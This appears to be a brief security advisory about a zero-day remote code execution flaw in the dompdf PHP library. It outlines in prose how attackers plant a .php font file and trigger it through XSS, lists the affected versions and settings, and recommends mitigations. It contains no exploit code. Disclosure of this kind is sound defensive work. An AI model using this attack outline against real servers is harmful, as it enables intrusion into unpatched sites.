A 0-day vulnerability has been identified in dompdf, a PHP-based HTML to PDF conversion library, that could lead to remote code execution in specific configurations.
Threat actors who want to execute code on the target system by exploiting the vulnerability first upload the malicious font files (CSS) with the .php extension to the webserver. Then threat actors access the said font files from the vulnerable website via XSS vulnerability and trigger a remote code execution vulnerability. The vulnerability can cause severe consequences for websites that require server-side creation of PDFs such as ticket purchase and payslips, especially when the entries are not sanitized enough to mitigate XSS flaws dompdf library is installed in a publicly accessible directory.
According to statistics published by Github, dompdf is known to have 59,250 installations. Dompdf 1.2.0 and earlier versions which are “$isRemoteEnabled” configuration, enabled and located in a directory accessible over the Internet, are vulnerable. However, versions 0.8.5 and earlier of the library are affected by the vulnerability even if this option is configured as “false.” In this context, it is recommended that users who are using vulnerable dompdf versions move the Dompdf outside of the web directory, configure the “$isRemoteEnabled” option as “false,” and apply hardening where user input is sanitized against possible XSS attacks until updates that fix the vulnerability are released.